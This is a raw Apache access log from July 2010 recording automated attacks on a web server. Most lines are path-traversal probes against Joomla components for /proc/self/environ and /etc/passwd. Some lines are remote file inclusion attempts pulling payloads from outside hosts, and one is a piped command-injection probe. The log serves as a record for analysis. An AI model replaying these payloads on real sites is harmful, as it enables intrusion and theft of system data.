89.200.169.163 - - [26/Jul/2010:05:23:21 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:23:21 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:05:23:42 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:23:42 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
64.34.172.171 - - [26/Jul/2010:05:24:04 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:24:04 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:24:09 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:24:09 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:24:39 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:24:39 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.834"
201.12.141.11 - - [26/Jul/2010:05:25:22 +0200] "GET /logs/access_log%20/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:25:22 +0200] "GET /logs/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:25:22 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:25:23 +0200] "GET /logs/access_log%20/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 312 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:25:23 +0200] "GET /logs/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:25:23 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-" "-"
89.200.169.163 - - [26/Jul/2010:05:26:16 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:26:17 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:26:17 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:26:17 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:36:57 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:36:57 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:36:57 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.813"
67.195.114.225 - - [26/Jul/2010:05:37:43 +0200] "GET /?C=N;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.169.163 - - [26/Jul/2010:05:37:44 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:37:44 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:37:45 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.813"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /logs/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /logs/access_log%20/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /logs/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:38:38 +0200] "GET /logs/access_log%20/index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 312 "-" "-"
74.52.48.66 - - [26/Jul/2010:05:48:36 +0200] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 801 "-" "Mozilla/5.0"
74.52.48.66 - - [26/Jul/2010:05:48:36 +0200] "GET //?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 665 "-" "Mozilla/5.0"
74.52.48.66 - - [26/Jul/2010:05:48:36 +0200] "GET /logs/access_log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
74.52.48.66 - - [26/Jul/2010:05:51:56 +0200] "GET //?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 665 "-" "Mozilla/5.0"
74.52.48.66 - - [26/Jul/2010:05:51:56 +0200] "GET /logs/access_log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
74.52.48.66 - - [26/Jul/2010:05:51:56 +0200] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 801 "-" "Mozilla/5.0"
99.198.108.74 - - [26/Jul/2010:05:57:50 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:05:57:50 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:06:15:45 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:06:15:45 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
87.98.217.83 - - [26/Jul/2010:06:42:37 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:06:42:37 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:06:42:37 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:06:42:37 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
80.248.211.49 - - [26/Jul/2010:06:50:17 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:50:17 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:50:18 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
216.227.218.75 - - [26/Jul/2010:07:09:31 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:09:32 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.832"
64.34.172.171 - - [26/Jul/2010:07:10:59 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:10:59 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
87.98.217.83 - - [26/Jul/2010:07:11:40 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:11:40 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:12:00 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:12:01 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
216.227.218.75 - - [26/Jul/2010:07:18:14 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:18:14 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:18:14 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.832"
91.215.170.13 - - [26/Jul/2010:07:20:48 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:20:49 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:20:50 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:20:51 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:39 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:42 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:42 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:43 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:46 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:49 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:09 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:09 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:09 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:10 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:27 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:28 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
64.34.172.171 - - [26/Jul/2010:07:22:29 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:22:29 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:22:29 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
91.215.170.13 - - [26/Jul/2010:07:22:32 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:33 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:35 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:51 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:52 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:31 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:35 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:35 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:35 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:25:59 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:26:05 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:44 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:44 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:45 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:51 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:36:52 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
207.46.13.94 - - [26/Jul/2010:07:37:32 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.215.170.13 - - [26/Jul/2010:07:47:09 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
207.46.13.94 - - [26/Jul/2010:07:47:57 +0200] "GET /logs/access_log HTTP/1.1" 200 48012 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.215.170.13 - - [26/Jul/2010:07:50:42 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:51:28 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:51:28 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:51:31 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
89.212.190.78 - - [26/Jul/2010:07:59:57 +0200] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
89.212.190.78 - - [26/Jul/2010:08:00:01 +0200] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
89.212.190.78 - - [26/Jul/2010:08:01:16 +0200] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 559 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
